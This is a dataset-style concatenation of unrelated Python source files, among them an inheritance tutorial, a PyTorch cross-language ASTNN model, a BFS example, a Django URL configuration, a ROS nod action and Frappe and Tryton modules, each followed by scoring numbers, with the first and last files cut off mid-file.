def get_my_first_name(self):
my_name = self.childs_firstname
return "Child" + " " + my_name
# method
def get_my_last_name(self): # Equal to get_first_name in BaseClass
last_name = super(Child_1, self).get_first_name() # Python 2 - super(className,object)
last_name = super().get_first_name() # Python 3 equivalent
return last_name
# method
def get_my_full_name(self):
return self.get_my_first_name() + " & " + self.get_my_last_name()
Child_1_object = Child_1("Pius", "Lucky") # instantiating the Child_1 class
print(Child_1_object.get_my_full_name()) # Child Lucky & Father Pius
# multiple class inheritance
# BaseClass 1
class Father:
def __init__(self, fathers_firstname): # Base __init__ method with self & 1 parameter
self.fathers_firstname = fathers_firstname
def get_first_name(self):
return self.fathers_firstname
# BaseClass 2
class Child_1:
def __init__(self, child_1_name, hobby):
self.child_1_name = child_1_name
self.hobby = hobby
def get_child1_name(self):
return self.child_1_name
def get_child1_hobby(self):
return self.hobby
# Derived Class
class Child_2(Father, Child_1):
"""
Child_2 class takes in two string parameters denoting the Father Class and Child_1 class as Base Class
Father: str
Child_1: str
"""
def __init__(self, fathers_firstname, child_1_name, hobby, childs_2_firstname):
# overriding fathers_firstname defined in Child_2 __init__() by the fathers_firstname defined in the Father __init__()
Father.__init__(self, fathers_firstname)
# overriding child_1_name & hobby defined in Child_2 __init__() by the child_1_name & hobby defined in the Child_1 __init__()
Child_1.__init__(self, child_1_name, hobby)
self.childs_2_firstname = childs_2_firstname # initializing the new attribute
# method
def get_my_first_name(self):
my_name = self.childs_2_firstname
return my_name
# method
def get_my_last_name(self): # Equal to get_first_name in BaseClass Father
last_name = super(Child_2, self).get_first_name() # Python 2 - super(className, object)
last_name = super().get_first_name() # Python 3 equivalent
return last_name
# method
def get_my_full_name(self):
return "{0} {1}".format(self.get_my_first_name(), self.get_my_last_name())
# method
def get_my_sibling_attributes(self):
sibling_name = super().get_child1_name() # Python 3 equivalent
sibling_hobby = super().get_child1_hobby() # Python 3 equivalent
return sibling_name + " & she likes " + sibling_hobby
# method
def about_me(self):
my_full_name = self.get_my_full_name()
my_sibling_name = self.get_my_sibling_attributes()
return "My name is {0}, I have a sibling called {1}".format(self.get_my_full_name(), self.get_my_sibling_attributes())
Child_2_object = Child_2("Pius", "Happy", "dancing", "Lucky") # instantiating the Child_2 class
print(Child_2_object.about_me()) # My name is <NAME>, I have a sibling called Happy & she likes dancing
# BONUS TIPS:
# __doc__
# Use this to get the document string of a particular class
print(Child_2.__doc__)
# Output:
# Child_2 class takes in two string parameters denoting the Father Class and Child_1 class as Base Class
# Father: str
# Child_1: str
# __subclasses__
print(Father.__subclasses__())
# Output:
# [<class '__main__.Child_2'>]
# Implication
# This means that Child_2 Class depends on the Father Class
print(Child_1.__subclasses__())
# Output:
# [<class '__main__.Child_2'>]
# Implication
# This means that Child_2 Class depends on the Father Class
# issubclass
print(issubclass(Child_2, Father))
# Output:
# True
# Implication
# This means that Child_2 Class depends on the Father Class
# relationship b/w self and object (or class instance)
class Worker:
def __init__(self, salary):
self.salary = salary
# method
def salary_checker(self):
my_salary = self.salary # self is the representation of the Worker Object inside the class [self is an instance of the class]
print(my_salary) # 5000
return my_salary
worker_object = Worker(5000)
worker_salary = worker_object.salary_checker() # "worker_salary" is the representation of the Worker object (worker_object) outside of the class [object is an instance of a class]
print(worker_salary) #5000
# NOTE:
# "worker_salary" is the representation of the object outside of the class
# "self" is the representation of the object inside the class.
# "self" & "object" both return the same result, 5000. | 4.25 | 4 |
pytheas/__about__.py | benvial/pytheas | 10 | 12786487 | from datetime import date
__version__ = "1.3.1"
__author__ = u"<NAME>"
__author_email__ = "<EMAIL>"
__copyright__ = u"Copyright (c) 2017-{}, {} <{}>".format(
date.today().year, __author__, __author_email__
)
__website__ = "https://benvial.github.io/pytheas"
__license__ = "License :: OSI Approved :: MIT License"
__status__ = "Development Status :: 5 - Production/Stable"
__description__ = (
"Python Electromagnetic Analysis and Simulation with the Finite Element Method"
)
| 1.734375 | 2 |
cl_astnn.py | yemao616/Cross-Lingual-Adversarial-Domain-Adaptation | 0 | 12786488 | <filename>cl_astnn.py
import torch
import torch.nn as nn
from torch.autograd import Variable
from tlstm import TLSTM
from astnn import ASTNN
class CrossLing(nn.Module):
"""
Cross-Language ASTNN Model
"""
def __init__(self, args):
super(CrossLing, self).__init__()
self.with_target_domain = args['with_target_domain']
self.mASTNN = ASTNN(args)
self.nASTNN = ASTNN(args)
self.sharedASTNN = ASTNN(args)
self.grl = GradientReversal(args['lambda'])
self.discriminator = Classifier(args['hidden_dim'], args['domain_size'])
self.shared2label = Classifier(args['hidden_dim'], args['label_size'])
self.m2label = Classifier(args['hidden_dim'], args['label_size'], True)
self.n2label = Classifier(args['hidden_dim'], args['label_size'], True)
def forward(self, m, n, m_share=None, n_share=None, t=None):
# private ASTNN
m_hidden = self.mASTNN(m)
n_hidden = self.nASTNN(n)
# shared ASTNN
if m_share:
m_shared_hidden = self.sharedASTNN(m_share)
else:
m_shared_hidden = self.sharedASTNN(m)
if n_share:
n_shared_hidden = self.sharedASTNN(n_share)
else:
n_shared_hidden = self.sharedASTNN(n)
# private classifier
m_prediction = self.m2label(torch.cat([m_hidden, m_shared_hidden], dim=1))
n_prediction = self.n2label(torch.cat([n_hidden, n_shared_hidden], dim=1))
# Discriminator
m_domain = self.discriminator(self.grl(m_shared_hidden))
n_domain = self.discriminator(self.grl(n_shared_hidden))
# shared classifier
m_shared_prediction = self.shared2label(m_shared_hidden)
n_shared_prediction = self.shared2label(n_shared_hidden)
m_output = [m_domain, m_prediction, m_shared_prediction, m_hidden, m_shared_hidden]
n_output = [n_domain, n_prediction, n_shared_prediction, n_hidden, n_shared_hidden]
if self.with_target_domain and t:
t_shared_hidden = self.sharedASTNN(t) # pass shared ASTNN
t_domain = self.discriminator(self.grl(t_shared_hidden)) # pass discriminator
t_output = t_domain
return m_output, n_output, t_output
return m_output, n_output
def forward_predict(self, inputs, switch):
"""
cl-astnn function to generate input for different switch (domain)
"""
if switch == 'm':
m_hidden = self.mASTNN(inputs)
m_shared_hidden = self.sharedASTNN(inputs)
output = self.m2label(torch.cat([m_hidden, m_shared_hidden], dim=1))
elif switch == 'n':
n_hidden = self.nASTNN(inputs)
n_shared_hidden = self.sharedASTNN(inputs)
output = self.n2label(torch.cat([n_hidden, n_shared_hidden], dim=1))
elif switch == 't':
t_shared_hidden = self.sharedASTNN(inputs)
output = self.shared2label(t_shared_hidden)
else:
raise ValueError('switch must be one of (m, n, t)')
return output
def forward_predict_tsne(self, inputs, switch='m'):
if switch == 'm':
hidden = self.mASTNN(inputs)
shared_hidden = self.sharedASTNN(inputs)
output = self.m2label(torch.cat([hidden, shared_hidden], dim=1))
else:
hidden = self.nASTNN(inputs)
shared_hidden = self.sharedASTNN(inputs)
output = self.n2label(torch.cat([hidden, shared_hidden], dim=1))
return output, hidden, shared_hidden
class GradientReversal(nn.Module):
"""
Gradient Reversal Layer
Forward pass is the identity function. In the backward pass,
the upstream gradients are multiplied by -lambda (i.e. gradient is reversed)
Ref: <NAME> al., Domain-adversarial training of neural networks (2016)
Link: https://jmlr.csail.mit.edu/papers/volume17/15-239/15-239.pdf
"""
def __init__(self, lambda_):
super(GradientReversal, self).__init__()
self.lambda_ = lambda_
def forward(self, x):
return x
def backward(self, x):
        return -self.lambda_ * x
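
# --- illustrative sketch (not part of the original model) ---------------------
# Defining `backward` on an nn.Module does not hook into autograd, so the class
# above will not actually reverse gradients during backpropagation. A common way
# to implement gradient reversal is a torch.autograd.Function; the names below
# (ReverseGradFn / grad_reverse) are illustrative assumptions only.
class ReverseGradFn(torch.autograd.Function):
    @staticmethod
    def forward(ctx, x, lambda_):
        # identity in the forward pass; remember the scaling factor
        ctx.lambda_ = lambda_
        return x.view_as(x)

    @staticmethod
    def backward(ctx, grad_output):
        # multiply upstream gradients by -lambda (gradient reversal)
        return -ctx.lambda_ * grad_output, None


def grad_reverse(x, lambda_=1.0):
    # usage sketch: hidden = grad_reverse(shared_hidden, lambda_) before the discriminator
    return ReverseGradFn.apply(x, lambda_)
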
class Classifier(nn.Module):
"""
Classification Layer
"""
def __init__(self, hidden_dim, output_dim, cat_hidden=False, bidirection=True):
super(Classifier, self).__init__()
if bidirection:
hidden_dim = 2 * hidden_dim
if cat_hidden:
hidden_dim = 2 * hidden_dim
self.fc = nn.Linear(hidden_dim, output_dim)
def forward(self, x):
out = torch.sigmoid(self.fc(x))
# tmp=self.fc2(tmp)
# tmp=self.fc3(tmp)
# tmp = F.log_softmax(tmp)
return out
class TemporalCrossLing(nn.Module):
"""
Temporal CrossLing Model
"""
def __init__(self, args):
super(TemporalCrossLing, self).__init__()
self.astnn = ASTNN(args)
self.Gastnn = ASTNN(args)
self.gpu = args['use_gpu']
self.input_size = args['hidden_dim'] * 4
self.pad_size = args['hidden_dim'] * 2
self.batch_size = args['batch_size']
self.label_size = args['label_size']
self.time = args['time']
self.hidden_size = 64
self.num_layers = 1
if self.time:
self.lstm = TLSTM(self.input_size, self.batch_size, self.hidden_size, self.label_size)
else:
self.lstm = nn.LSTM(self.input_size, self.hidden_size, num_layers=1, batch_first=True)
self.fc = nn.Linear(self.hidden_size, self.label_size)
def pad_zeros(self, num):
zeros = Variable(torch.zeros(num, self.pad_size))
if self.gpu:
return zeros.cuda()
return zeros
def init_hidden(self):
if self.gpu is True:
h0 = Variable(torch.zeros(self.num_layers, self.batch_size, self.hidden_size).cuda())
c0 = Variable(torch.zeros(self.num_layers, self.batch_size, self.hidden_size).cuda())
else:
h0 = torch.zeros(self.num_layers, self.batch_size, self.hidden_size)
c0 = torch.zeros(self.num_layers, self.batch_size, self.hidden_size)
return h0, c0
def forward(self, x):
if self.time:
# using TLSTM
feature, time = x
x = feature
else:
time = None
lens = [len(item) for item in x]
max_len = max(lens)
self.batch_size = len(x)
batch_ast = []
Gbatch_ast = []
batch_t = []
        for i in range(self.batch_size): # each student automatically forms a batch for astnn
pad_len = max(max_len - lens[i], 0)
if pad_len > 0:
cur_pad = self.pad_zeros(pad_len)
batch_ast.append(cur_pad)
Gbatch_ast.append(cur_pad)
batch_t.append(Variable(torch.zeros(pad_len)))
cur_encode = self.astnn(x[i])
batch_ast.append(cur_encode)
cur_Gencode = self.Gastnn(x[i])
Gbatch_ast.append(cur_Gencode)
if self.time:
batch_t.append(torch.FloatTensor(time[i]))
encodes = torch.cat(batch_ast)
encodes = encodes.view(self.batch_size, max_len, -1)
Gencodes = torch.cat(Gbatch_ast)
Gencodes = Gencodes.view(self.batch_size, max_len, -1)
if self.time:
encodes_t = torch.cat(batch_t)
time = encodes_t.view(self.batch_size, max_len, -1) # (b, max_len, 1)
all_encodes = torch.cat([encodes, Gencodes], dim=2)
if self.gpu:
all_encodes = Variable(all_encodes).cuda()
time = time.cuda()
if self.time:
out, _ = self.lstm((all_encodes, time))
else:
# Set initial hidden and cell states
h0, c0 = self.init_hidden()
# Forward propagate LSTM
out, _ = self.lstm(all_encodes, (h0, c0)) # out: tensor of shape (batch_size, seq_length, hidden_size)
# Decode the hidden state of the last time step
out = self.fc(out[:, -1, :])
return torch.sigmoid(out)
| 2.828125 | 3 |
top/api/rest/WdtStatSalesBySpecShopWarehouseQueryRequest.py | SAMZONG/taobao-sdk-python3 | 0 | 12786489 | '''
Created by auto_sdk on 2020.09.01
'''
from top.api.base import RestApi
class WdtStatSalesBySpecShopWarehouseQueryRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.consign_date = None
self.sid = None
def getapiname(self):
return 'hu3cgwt0tc.wdt.stat.sales.by.spec.shop.warehouse.query'
| 1.65625 | 2 |
Notes/Sprint3/GraphBFT.py | mark-morelos/CS_Notes | 1 | 12786490 | # pseudocode
# Breadth-First Search
"""
procedure BFS(G, root) is
let Q be a queue
label root as discovered
Q.enqueue(root)
while Q is not empty do
v := Q.dequeue()
if v is the goal then
return v
for all edges from v to w in G.adjacentEdges(v) do
if w is not labeled as discovered then
label w as discovered
w.parent := v
Q.enqueue(w)
"""
from collections import deque
adjList = {
1: {2, 3},
2: {4},
3: {4},
4: {1}
}
def bfs(graph, startingNode, destinationNode):
queue = deque()
visited = set()
visited.add(startingNode)
queue.append(startingNode)
while len(queue) > 0:
currNode = queue.popleft()
print(f"visiting node {currNode}")
if currNode == destinationNode:
print(f"found dthe destination node {currNode}")
return currNode
for neighbor in graph[currNode]:
if neighbor not in visited:
visited.add(neighbor)
queue.append(neighbor)
bfs(adjList, 1, 4) | 3.96875 | 4 |
info/examples/format_conversion/convert_pdb.py | stxinsite/geomm | 3 | 12786491 | <reponame>stxinsite/geomm<gh_stars>1-10
# make sure to install dependencies in 'conversion.requirements.txt'
import os
import os.path as osp
import shutil
import sqlite3
import numpy as np
import pandas as pd
import tables as pytables
import mdtraj as mdj
from wepy.util.mdtraj import mdtraj_to_json_topology
from wepy.util.json_top import json_top_chain_df, json_top_residue_df, json_top_atom_df
traj = mdj.load('../lysozyme_pxylene.pdb')
if osp.exists("outputs"):
shutil.rmtree("outputs")
os.makedirs("outputs")
# the JSON format
json_top = mdtraj_to_json_topology(traj.top)
with open('outputs/lysozyme_pxylene.top.json', 'w') as wf:
wf.write(json_top)
# FASTA residue sequence
fasta_str = traj.top.to_fasta(chain=0)
with open('outputs/lysozyme_pxylene.res.fasta', 'w') as wf:
wf.write(fasta_str)
## topology tables
# Bonds
# you can get a table using mdtraj, but we just use the bonds here
mdj_atoms_df, bonds = traj.top.to_dataframe()
# just the first two columns (atom indices) for our purposes
bonds = bonds[:,0:2]
# we can just write this multiple ways with numpy
np.savetxt('outputs/lysozyme_pxylene.bonds.npy_txt', bonds)
np.save('outputs/lysozyme_pxylene.bonds.npy', bonds)
# make a pandas data frame
bond_df = pd.DataFrame(bonds)
# but wepy provides the ability to get normalized versions for each
# level
chain_df = json_top_chain_df(json_top)
residue_df = json_top_residue_df(json_top)
atom_df = json_top_atom_df(json_top)
bond_df.to_csv('outputs/lysozyme_pxylene.bond.csv', index=False)
chain_df.to_csv('outputs/lysozyme_pxylene.chain.csv', index=False)
residue_df.to_csv('outputs/lysozyme_pxylene.residue.csv', index=False)
atom_df.to_csv('outputs/lysozyme_pxylene.atom.csv', index=False)
# to an SQLite3 database
db = sqlite3.Connection("outputs/lysozyme_pxylene.sqlite3")
bond_df.to_sql('bonds', db)
chain_df.to_sql('chains', db)
residue_df.to_sql('residues', db)
atom_df.to_sql('atoms', db)
# to an HDF5 file
bond_df.to_hdf('outputs/lysozyme_pxylene.top.h5', 'bonds')
chain_df.to_hdf('outputs/lysozyme_pxylene.top.h5', 'chains')
residue_df.to_hdf('outputs/lysozyme_pxylene.top.h5', 'residues')
atom_df.to_hdf('outputs/lysozyme_pxylene.top.h5', 'atoms')
# to an excel spreadsheet
with pd.ExcelWriter('outputs/lysozyme_pxylene.top.xlsx', mode='w') as writer:
bond_df.to_excel(writer, sheet_name='bonds')
chain_df.to_excel(writer, sheet_name='chains')
residue_df.to_excel(writer, sheet_name='residues')
atom_df.to_excel(writer, sheet_name='atoms')
## coordinates
# separately, in binary format
coords = traj.xyz
np.savez('outputs/lysozyme_pxylene_reference.npz', coords)
| 2.3125 | 2 |
RCNN_modified.py | CassieXueq/GitTest | 0 | 12786492 | <reponame>CassieXueq/GitTest
import torchvision
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor
from torchvision.models.detection import FasterRCNN
from torchvision.models.detection.rpn import AnchorGenerator
'''
---------------------------------------------------------------------
Let’s suppose that you want to start from a model pre-trained on COCO and want to
finetune it for your particular classes. Here is a possible way of doing it:
--------------------------------------------------------------------------------
'''
# load a model pre-trained on COCO
model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=True)
# replace the classifier with a new one, that has
# num_classes which is user-defined
num_classes = 2 # 1 class (person) + background
# get number of input features for the classifier
in_features = model.roi_heads.box_predictor.cls_score.in_features
# replace the pre-trained head with a new one
model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)
'''
---------------------------------------------------------------------
Modifying the model to add a different backbone
-----------------------------------------------------------------------
'''
# load a pre-trained model for classification and return
# only the features
backbone = torchvision.models.mobilenet_v2(pretrained=True).features
# FasterRCNN needs to know the number of
# output channels in a backbone. For mobilenet_v2, it's 1280
# so we need to add it here
backbone.out_channels = 1280
# let's make the RPN generate 5 x 3 anchors per spatial
# location, with 5 different sizes and 3 different aspect
# ratios. We have a Tuple[Tuple[int]] because each feature
# map could potentially have different sizes and
# aspect ratios
anchor_generator = AnchorGenerator(sizes=((32, 64, 128, 256, 512),),
aspect_ratios=((0.5, 1.0, 2.0),))
# let's define what are the feature maps that we will
# use to perform the region of interest cropping, as well as
# the size of the crop after rescaling.
# if your backbone returns a Tensor, featmap_names is expected to
# be [0]. More generally, the backbone should return an
# OrderedDict[Tensor], and in featmap_names you can choose which
# feature maps to use.
roi_pooler = torchvision.ops.MultiScaleRoIAlign(featmap_names=[0],
output_size=7,
sampling_ratio=2)
# put the pieces together inside a FasterRCNN model
model = FasterRCNN(backbone,
num_classes=2,
rpn_anchor_generator=anchor_generator,
box_roi_pool=roi_pooler) | 2.296875 | 2 |
asl-api/asl-api/urls.py | ooawagaeri/orbital-asl-application | 2 | 12786493 | <gh_stars>1-10
"""
urls.py
URL Mapping between HTTP and Views
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls import url
from django.views.static import serve
from django.conf.urls.static import static
urlpatterns = [
# Serve Admin dashboard
path('admin/', admin.site.urls),
# Serve API
path('api/', include('engine.urls')),
# Serve media images
url(r'^media/(?P<path>.*)$', serve, {'document_root': settings.MEDIA_ROOT, })
]
# Read media folder images
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 2.203125 | 2 |
python/testData/intentions/PyConvertCollectionLiteralIntentionTest/convertTupleToSetNotAvailableInAssignmentTarget.py | jnthn/intellij-community | 2 | 12786494 | x, <caret>y = 1, 2 | 1.234375 | 1 |
tests/test_utils.py | cnzeki/tensorboardX | 0 | 12786495 | <filename>tests/test_utils.py<gh_stars>0
from tensorboardX import summary
import numpy as np
import pytest
import unittest
from tensorboardX.utils import make_grid, _prepare_video
class UtilsTest(unittest.TestCase):
def test_to_HWC(self):
np.random.seed(1)
test_image = np.random.randint(0, 256, size=(3, 32, 32), dtype=np.uint8)
converted = convert_to_HWC(test_image, 'chw')
assert converted.shape == (32, 32, 3)
test_image = np.random.randint(0, 256, size=(16, 3, 32, 32), dtype=np.uint8)
converted = convert_to_HWC(test_image, 'nchw')
assert converted.shape == (64, 256, 3)
test_image = np.random.randint(0, 256, size=(32, 32), dtype=np.uint8)
converted = convert_to_HWC(test_image, 'hw')
assert converted.shape == (32, 32, 3)
def test_prepare_video(self):
# at each timestep the sum over all other dimensions of the video should stay the same
np.random.seed(1)
V_before = np.random.random((4, 10, 3, 20, 20))
V_after = _prepare_video(np.copy(V_before))
V_before = np.swapaxes(V_before, 0, 1)
V_before = np.reshape(V_before, newshape=(10,-1))
V_after = np.reshape(V_after, newshape=(10,-1))
np.testing.assert_array_almost_equal(np.sum(V_before, axis=1), np.sum(V_after, axis=1))
def convert_to_HWC(tensor, input_format): # tensor: numpy array
    assert(len(set(input_format)) == len(input_format)), "You cannot use the same dimension shorthand twice."
assert(len(tensor.shape) == len(input_format)), "size of input tensor and input format are different"
input_format = input_format.upper()
if len(input_format) == 4:
index = [input_format.find(c) for c in 'NCHW']
tensor_NCHW = tensor.transpose(index)
tensor_CHW = make_grid(tensor_NCHW)
return tensor_CHW.transpose(1, 2, 0)
if len(input_format) == 3:
index = [input_format.find(c) for c in 'HWC']
return tensor.transpose(index)
if len(input_format) == 2:
index = [input_format.find(c) for c in 'HW']
tensor = tensor.transpose(index)
tensor = np.stack([tensor, tensor, tensor], 2)
return tensor
| 2.390625 | 2 |
src/nod.py | kirmani/hlpr_cadence | 0 | 12786496 | <filename>src/nod.py
import actionlib
import rospy
from std_msgs.msg import Header
from geometry_msgs.msg import TransformStamped, Transform, Vector3, Quaternion
from hlpr_lookat.msg import LookatWaypointsAction, LookatWaypointsGoal, LookatWaypointsResult
from action import Action
import subprocess
import time
def transform_helper(vec3, frame):
pos = TransformStamped()
pos.child_frame_id = frame
pos.header = Header()
pos.transform = Transform()
pos.transform.translation = vec3
return pos
class Nod(Action):
def __init__(self):
Action.__init__(self, 'look_center', [],
{},
{})
def Task(self):
rospy.init_node('scan_scene')
# Connect to the action client
scan_client = actionlib.SimpleActionClient('lookat_waypoints_action_server', LookatWaypointsAction)
rospy.logwarn("Waiting for scan scene server to load")
scan_client.wait_for_server()
rospy.logwarn("Scan scene loaded")
#Generate some positions
center = transform_helper(Vector3(1.0,0.0,0.2), 'pan_base_link')
down = transform_helper(Vector3(1.0,0.0,-2.0), 'pan_base_link')
# Generate some times
pause_2 = rospy.Duration(2.0)
# Store them away to send off
positions = [down, center]
scan_times = [pause_2, pause_2]
# Send the goals
goal = LookatWaypointsGoal()
goal.scan_positions = positions
goal.scan_times = scan_times
scan_client.send_goal(goal)
# Print results
rospy.loginfo("Waiting for scan to finish")
scan_client.wait_for_result()
rospy.loginfo(scan_client.get_goal_status_text())
print("Looked center: %s")
| 2.328125 | 2 |
cartrade/templates/pages/details_variants.py | vignesharumainayagam/csdwale-cartrade-live | 0 | 12786497 | # -*- coding: utf-8 -*-
# Copyright (c) 2018, Tridots Tech Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
# from _future_ import unicode_literals
import frappe
import frappe.utils
import json
from frappe import _
def get_context(context):
location = frappe.request.cookies.get('city_location')
path = frappe.local.request.path
path = path.replace('csd-', '')
path = path.replace('-price', '')
context.path = path
path = path.strip('/')
word = path.split('/')
category_route = word[0]
brand_route = word[1]
item_route = word[2]
variant_route = word[3]
addrightadd = frappe.db.get_value('Widget Placeholder', fieldname=['google_ad_script'], filters={"view": 'Variant Detail Page', 'position': 'Right Panel'})
context.addrightadd = addrightadd
context.addtopadd = frappe.db.get_value('Widget Placeholder', fieldname=['google_ad_script'], filters={'view': 'Variant Detail Page', 'position': 'Top Panel'})
context.addbottomadd = frappe.db.get_value('Widget Placeholder', fieldname=['google_ad_script'], filters={'view': 'Variant Detail Page', 'position': 'Bottom Panel'})
context.addmidads = frappe.db.get_value('Widget Placeholder', fieldname=['google_ad_script'], filters={'view': 'Variant Detail Page', 'position': 'Middle Panel'})
item_name = frappe.db.get_value("Item",
filters={'route': item_route}, fieldname=['name'])
context.item_brand = frappe.db.get_value("ItemBrand",
filters={'route': brand_route}, fieldname=['brand_name'])
context.item_title = frappe.db.get_value("Item",
filters={'route': item_route}, fieldname=['item_name'])
context.category_title = frappe.db.get_value("Category",
filters={'route': category_route}, fieldname=['category_name'])
context.item_brand_route = brand_route
context.item_category_route = category_route
context.item_route = item_route
context.variant_route = variant_route
context.variant_title = frappe.db.get_value("Item Variant",
filters={'route': variant_route, 'item': item_name}, fieldname=['variant_name'])
context.meta_title = frappe.db.get_value("Item Variant",
filters={'route': variant_route, 'item': item_name}, fieldname=['meta_title'])
context.meta_description = frappe.db.get_value("Item Variant",
filters={'route': variant_route, 'item': item_name}, fieldname=['meta_description'])
context.meta_keywords = frappe.db.get_value("Item Variant",
filters={'route': variant_route, 'item': item_name}, fieldname=['meta_keywords'])
context.item_featured_image = frappe.db.get_value("Item",
filters={'route': item_route}, fieldname=['featured_image'])
item_variant_doc_name = frappe.db.get_value("Item Variant",
filters={'route': variant_route}, fieldname=['name'])
context.item_variant_doc_name =item_variant_doc_name
item_variants = frappe.db.get_all("Item Variant",
fields=['route','variant_name', 'name'],
filters={'item': item_name},
limit_page_length= 100)
for x in item_variants:
if frappe.request.cookies.get('city_location'):
price = frappe.db.get_list('Item Variant Price',
fields = ['market_price', 'csd_price'],
filters = {'variant': x.name, 'city': frappe.request.cookies.get('city_location'), 'item': item_name})
if len(price) > 0:
x.csd_price = price[0].csd_price
x.market_price = price[0].market_price
else:
x.csd_price = "Na"
x.market_price = "Na"
else:
price = frappe.db.get_list('Item Variant Price',
fields = ['market_price', 'csd_price'],
filters = {'variant': x.name, 'city': 'Delhi', 'item': item_name})
if len(price) > 0:
x.csd_price = price[0].csd_price
x.market_price = price[0].market_price
else:
x.csd_price = "Na"
x.market_price = "Na"
context.item_variants = item_variants
variant_specifications = frappe.db.get_list('Item Specification',
fields=['specification', 'value'],
filters={'parent': item_variant_doc_name})
for x in variant_specifications:
x.specification_group = frappe.db.get_value("Specification",
filters={'name': x.specification}, fieldname=['specification_category'])
context.variant_specifications = variant_specifications
if frappe.request.cookies.get('city_location'):
price = frappe.db.get_list('Item Variant Price',
fields = ['market_price', 'csd_price'],
filters = {'variant': item_variant_doc_name, 'city': frappe.request.cookies.get('city_location'), 'item': item_name})
if len(price) > 0:
context.csd_price = price[0].csd_price
context.market_price = price[0].market_price
else:
context.csd_price = "Na"
context.market_price = "Na"
else:
price = frappe.db.get_list('Item Variant Price',
fields = ['market_price', 'csd_price'], filters = {'variant': item_variant_doc_name, 'city': 'Delhi', 'item': item_name})
if len(price) > 0:
context.csd_price = price[0].csd_price
context.market_price = price[0].market_price
context.difference=price[0].difference
else:
context.csd_price = "Na"
context.market_price = "Na" | 1.695313 | 2 |
src/common/pytorch/layer/normalize_linear_layer.py | wu-uw/OpenCompetition | 15 | 12786498 | import torch
import torch.nn as nn
from torch.nn import Parameter
from torch.autograd import Variable
class NormedLinearLayer(nn.Module):
def __init__(self, input_dim, out_dim, momentum=0.1):
super(NormedLinearLayer, self).__init__()
self.input_dim = input_dim
self.out_dim = out_dim
self.momentum = momentum
self._build_model()
def _build_model(self):
self.linear = nn.utils.weight_norm(nn.Linear(self.input_dim, self.out_dim))
        self.bias = Parameter(torch.Tensor(self.out_dim))
self.register_buffer('running_mean', torch.zeros(self.out_dim))
self.reset_parameter()
def reset_parameter(self):
self.running_mean.zero_()
self.bias.data.zero_()
def forward(self, inputs):
inputs = self.linear(inputs)
if self.training:
avg = torch.mean(inputs, dim=0)
self.running_mean = (1 - self.momentum) * self.running_mean + self.momentum * avg.data
else:
avg = Variable(self.running_mean, requires_grad=False)
out = inputs - avg + self.bias
return out
| 2.671875 | 3 |
product.py | mbehrle/trytond-sale-available-stock | 0 | 12786499 | <filename>product.py
# -*- coding: utf-8 -*-
"""
product.py
"""
from trytond.pyson import PYSONEncoder, PYSONDecoder
from trytond.modules.stock import ProductByLocation
__all__ = ['ProductByLocationExcludeAssigned']
class ProductByLocationExcludeAssigned(ProductByLocation):
"""
Show Product by Locations excluding assigned quantities
"""
__name__ = 'product.by_location.exclude_assigned'
def do_open(self, action):
action, data = super(
ProductByLocationExcludeAssigned, self
).do_open(action)
# Decode pyson context
context = PYSONDecoder().decode(action['pyson_context'])
# Update context
context['stock_assign'] = True
# Encode the new context to create new pyson context
action['pyson_context'] = PYSONEncoder().encode(context)
return action, data
| 2.515625 | 3 |
phr/catalogo/api/serializers.py | richardqa/django-ex | 0 | 12786500 | <reponame>richardqa/django-ex
# coding=utf-8
from rest_framework import serializers
from phr.catalogo.models import (
CatalogoAyudaTecnica, CatalogoCIE, CatalogoDeficiencia, CatalogoDiscapacidad, CatalogoEtnia, CatalogoFinanciador,
CatalogoGradoInstruccion, CatalogoProcedimiento, CatalogoRaza, FamiliaMedicamentoAntecedenteSugerido,
MedicamentoAntecedenteSugerido,
)
class ListaCatalogoCIESerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoCIE
exclude = []
class DetalleCatalogoCIESerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoCIE
exclude = []
class ListaCatalogoProcedimientoSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoProcedimiento
exclude = []
class DetalleCatalogoProcedimientoSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoProcedimiento
exclude = []
class ListaCatalogoDeficienciaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoDeficiencia
exclude = []
class DetalleCatalogoDeficienciaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoDeficiencia
fields = ['id', 'categoria_deficiencia', 'nombre_deficiencia', 'get_deficiencia_subnivel']
class ListaCatalogoDiscapacidadSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoDiscapacidad
exclude = []
class DetalleCatalogoDiscapacidadSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoDiscapacidad
exclude = []
class ListaCatalogoRazaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoRaza
exclude = []
class DetalleCatalogoRazaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoRaza
fields = ['descripcion', 'get_etnias']
class ListaCatalogoEtniaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoEtnia
exclude = []
class DetalleCatalogoEtniaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoEtnia
exclude = []
class ListaCatalogoFinanciadorSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoFinanciador
exclude = []
class DetalleCatalogoFinanciadorSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoFinanciador
exclude = []
class ListaCatalogoAyudaTecnicaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoAyudaTecnica
exclude = []
class DetalleCatalogoAyudaTecnicaSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoAyudaTecnica
exclude = []
class ListaCatalogoGradoInstruccionSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoGradoInstruccion
exclude = []
class DetalleCatalogoGradoInstruccionSerializer(serializers.ModelSerializer):
class Meta:
model = CatalogoAyudaTecnica
exclude = []
class MedicamentoFamiliaAntecedenteSugeridoSerializer(serializers.ModelSerializer):
class Meta:
model = FamiliaMedicamentoAntecedenteSugerido
fields = ('codigo', 'nombre',)
class MedicamentoAntecedenteSugeridoSerializer(serializers.ModelSerializer):
class Meta:
